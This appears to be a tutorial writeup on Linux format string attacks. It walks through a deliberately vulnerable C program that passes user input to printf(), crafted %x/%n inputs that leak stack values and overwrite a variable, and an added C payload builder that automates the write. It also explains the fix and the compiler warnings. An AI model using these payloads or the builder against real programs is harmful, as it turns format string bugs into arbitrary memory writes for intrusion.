path: root/md/writeup/linux_format_string_attack.md
blob: 2a289e1be073684134a90c247a7fba5337316c84
title:X11 Linux Format String Attack
keywords:linux,c,formatting,printf

# Linux Format String Attack
A format string attack abuses C functions that take a printf()-style format
string. printf() is the classic case, but every function in the family
(fprintf(), sprintf(), snprintf(), syslog(), ...) is affected the moment
untrusted input is passed as the format argument instead of as data.
C code that misuses printf() this way:

```c
#include <stdio.h>
#include <string.h>

int main( int argc, char **argv )
{
    static int i = 0;
    char text[1000];

    if (argc < 2)
        return 1;
    strcpy(text, argv[1]);          /* copies the first argument into the buffer */
    printf("%.8x\n", &i);           /* leaks the address of the static i (32-bit build) */
    printf("No way it never will works because value of i=%d\n", i);
    printf( text );                 /* BUG: user input used as the format string */
    printf("\nValue of i=%d\n", i); /* did the format string change i? */
    return 0;
}
```
The first printf() prints the address of the static variable i. The program
then prints the value of i, calls printf() with the program's first argument
as the format string, and finally prints i again so we can see whether it
changed. The runs below come from a 32-bit, non-PIE build (i lives at
0x08049674 and every stack slot is 4 bytes); a 64-bit or PIE build gives
different addresses and different slot offsets.

Run:

```sh
./e1 'Halolo'
```

Output:
```text
08049674
No way it never will works because value of i=0
Halolo
Value of i=0
```

Run:
```sh
./e1 'Halolo%s'
```

Output:
```text
08049674
No way it never will works because value of i=0
Halolo(null)
Value of i=0
```
The `%s` made printf() read the next vararg slot on the stack as a `char *`
and dereference it. That slot happened to hold 0, which glibc prints as
`(null)`; a non-zero garbage value would have crashed the program.

Run:
```sh
./e1 $'\x74\x96\x04\x08_%x'
```

Output:
```text
08049674
No way it never will works because value of i=0
t?_0
Value of i=0
```
The first four bytes of the input are the address of i in little-endian
order; the terminal shows them as `t?` because 0x96, 0x04 and 0x08 are not
printable. `%x` then printed the first vararg slot, which holds 0.

`%n` is the interesting conversion: it writes the number of bytes printed so
far into the `int` pointed to by the next argument. Try it:

Run:
```sh
./e1 $'\x74\x96\x04\x08_%x_%n'
```

Output:

```text
08049674
No way it never will works because value of i=0
Segmentation fault
```
`%x` consumed the first slot (0) and `%n` took the second slot, the value 8,
as the pointer to write through. Address 8 is not mapped, so the write
faulted.

Run:

```sh
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%x_%n'
```

Output:
```text
08049674
No way it never will works because value of i=0
t?_0_8_40_4_4_
Value of i=16
```
Five `%x` conversions ate the first five slots (0, 8, 0x40, 4, 4). The sixth
slot is the start of the text buffer, i.e. the four address bytes we put
there, so `%n` wrote through the address of i. The value stored is the byte
count printed so far: 4 address bytes plus the 12 characters `_0_8_40_4_4_`
gives 16.

Run:

```sh
./e1 $'\x74\x96\x04\x08_%x_%x_%x_%x_%.1201x_%n'
```

Output:
```text
08049674
No way it never will works because value of i=0
t?_0_8_40_4_000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000004_
Value of i=1216
```

The precision `.1201` pads the fifth value with zeros to 1201 characters, so
the count at `%n` is 4 address bytes + 10 characters (`_0_8_40_4_`) + 1201 +
1 = 1216. By choosing the width or precision you can write almost any value
into i, and by putting a different address in the buffer you can write it
anywhere that is writable, which is how a format string bug turns into a
write-what-where primitive (in practice large values are written a byte or
a short at a time with `%hhn`/`%hn` rather than by printing millions of
padding characters). The fix is to never let user data be the format:
`printf("%s", text)` instead of `printf(text)`, and compile with
`-Wformat -Wformat-security` so the compiler flags the pattern.
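The two manual steps above (finding which vararg slot holds the buffer, then
padding so that `%n` stores the wanted number) can be automated. The block
below is an added example written for this page, not code from the writeup:
`find_argpos()` parses the output of an `AAAA_%x_%x_...` probe and returns
the slot that contains `41414141`; `build_payload()` generalizes the page's
payload by using `%8x` for every skipped slot (always exactly 8 characters,
so the count is predictable) and a wide last `%x` to reach the target value;
`simulate_write()` dry-runs the payload with a controlled `snprintf()` whose
varargs stand in for the stack slots e1 printed (0, 8, 0x40, 4, 4) and whose
sixth argument is the address of a local `victim` where e1 has the start of
its `text[]` buffer. The probe string, the slot values, the address
0x08049674 and the `victim` variable are constructed for the demo; on a real
target the offsets come from the probe run.

```c
/* Added example: e1-style %n payload builder and a controlled dry run.
 * Nothing here touches a real vulnerable binary; the stack slots are
 * emulated by explicit varargs (constructed demo values). */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Parse the output of a probe like "AAAA_%x_%x_%x..." and return the 1-based
 * vararg slot that holds the start of our buffer (0x41414141), or -1. */
int find_argpos(const char *probe_output)
{
    const char *p = probe_output;
    if (strncmp(p, "AAAA", 4) != 0)
        return -1;
    p += 4;
    int slot = 0;
    while (*p == '_') {
        p++;
        slot++;
        if (strncmp(p, "41414141", 8) == 0 && (p[8] == '_' || p[8] == '\0'))
            return slot;
        while (*p && *p != '_')
            p++;
    }
    return -1;
}

/* Build "<addr>%8x%8x...%<W>x%n" so that, when the buffer is vararg slot
 * ARGPOS, %n stores VALUE into *TARGET. Returns payload length or -1. */
int build_payload(uint32_t target, unsigned value, int argpos,
                  char *out, size_t outlen)
{
    if (argpos < 2 || outlen < 4)
        return -1;
    /* fixed part: 4 address bytes + one "%8x" (8 chars) per skipped slot
     * except the last, whose width is chosen to hit VALUE exactly */
    unsigned fixed = 4 + 8u * (unsigned)(argpos - 2);
    if (value < fixed + 8)              /* %8x never prints fewer than 8 */
        return -1;
    unsigned last_width = value - fixed;
    size_t n = 0;
    for (int k = 0; k < 4; k++) {       /* little-endian address, no NULs */
        unsigned char b = (unsigned char)(target >> (8 * k));
        if (b == 0)
            return -1;                  /* a NUL byte would end the string */
        out[n++] = (char)b;
    }
    for (int k = 0; k < argpos - 2; k++) {
        int w = snprintf(out + n, outlen - n, "%%8x");
        if (w < 0 || (size_t)w >= outlen - n)
            return -1;
        n += (size_t)w;
    }
    int w = snprintf(out + n, outlen - n, "%%%ux%%n", last_width);
    if (w < 0 || (size_t)w >= outlen - n)
        return -1;
    return (int)(n + (size_t)w);
}

/* Stand-in for e1's printf(text): the varargs play the stack slots, with
 * &victim where e1 has the start of text[]. Returns what %n stored, or
 * 0xffffffff on failure. snprintf is reached through a pointer because
 * glibc's fortified wrapper (_FORTIFY_SOURCE) aborts on %n in a writable
 * format string, which is exactly the mitigation this attack meets on
 * hardened builds. */
unsigned simulate_write(unsigned value)
{
    static char sink[4096];
    char payload[64];
    int victim = 0;
    int (*vuln_snprintf)(char *, size_t, const char *, ...) = snprintf;

    if (value >= sizeof sink)
        return 0xffffffffu;
    if (build_payload(0x08049674u, value, 6, payload, sizeof payload) < 0)
        return 0xffffffffu;
    vuln_snprintf(sink, sizeof sink, payload, 0u, 8u, 0x40u, 4u, 4u, &victim);
    return (unsigned)victim;
}

int main(void)
{
    printf("buffer is vararg slot %d\n",
           find_argpos("AAAA_0_8_40_4_4_41414141"));   /* constructed probe */
    printf("simulated i = %u\n", simulate_write(1216));
    return 0;
}
```

Build with `gcc -Wall fmtdemo.c -o fmtdemo` on any architecture; the dry run
is plain, well-defined C because the varargs match the conversions. Feeding
the generated payload to the real e1 instead would need the page's 32-bit
build and the real slot index from the probe, and `build_payload()` refuses
addresses containing a NUL byte since strcpy() would truncate them.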